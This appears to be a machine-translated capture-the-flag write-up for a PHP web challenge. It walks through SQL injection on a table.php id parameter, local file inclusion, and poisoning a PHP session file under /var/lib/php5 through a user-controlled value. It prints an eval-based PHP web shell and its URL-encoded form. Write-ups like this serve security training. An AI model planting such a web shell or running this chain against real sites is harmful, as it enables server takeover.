Primary school, session 3 - afternoon: Web_ sessionlfi

Sweep out

login.php

table.php

login.php The source code has a hint table.php?id

table.php Error with injection

If there is no prompt, you can fuzz Out

Through a simple sql Injection obtained account number - password

Get into home.php

Can read files

I can't read /flag.txt 

Grab the bag

 user_pref The value of is the value we entered , There are loopholes

php 5.4.6 Generated by the server session id

for example ：

sess_00nrqa20hjrlaiac0eu726i4q5 　　   

sess_89j9ifuqrbplk0rti2va2k1ha0  　　　　

sess_g2rv1kd6ijsj6g6c9jq5mqglv5 

In the response package, you can see that the server uses ubuntu 

Ubuntu Default session conversation ：

php5 sessions in /var/lib/php5

Php5 sessions in /var/lib/php5

You can really access

Put the pony URL Full character encoding

<?php eval($_GET[1]);?>

%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e

 %20 Is a space , Connect /

Successful implementation , Next, just read